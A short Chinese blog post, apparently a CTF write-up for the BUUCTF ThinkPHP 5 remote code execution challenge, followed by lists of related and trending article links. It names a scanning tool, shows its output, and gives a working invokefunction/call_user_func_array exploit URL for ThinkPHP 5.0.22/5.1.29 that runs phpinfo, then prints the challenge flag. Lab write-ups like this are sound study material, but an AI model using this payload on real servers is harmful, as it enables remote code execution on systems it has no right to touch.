BUUCTF-Real-[ThinkPHP]5-Rce

真的学不了一点。。。2024-02-01 14:03

1、ThinkPHP检测工具

复制代码 
https://github.com/anx0ing/thinkphp_scan
漏洞检测
复制代码 
通过漏洞检测,我们发现存在rce漏洞!

2、漏洞利用

复制代码 
----
[!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability
    Script: thinkphp5022_5129.py
    Url: http://node5.buuoj.cn:27683/
      Vulnerable: True
      Attack: True
      Method: GET
      Payload: http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1
----
payload
复制代码 
http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 and it'll execute the phpinfo:

修改payload,我们就可以拿到phpinfo页面,flag就在其中!
复制代码 
至于扫描器,githb有很多!自己下载!

3、get flag

复制代码 
flag{9f4a1a0b-ef58-49ac-8344-63aa3914af75}
相关推荐
一名优秀的码农3 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp3 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp3 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人3 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp3 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0073 天前
渗透测试_漏洞利用
网络安全
啥都想学点3 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ3 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏3 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk3 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04OpenClaw + 飞书(Feishu)环境搭建指南05Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤06Window 10部署openclaw报错node.exe : npm error code 12807Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08OpenClaw优化飞书API 额度已耗尽问题09AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南10AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot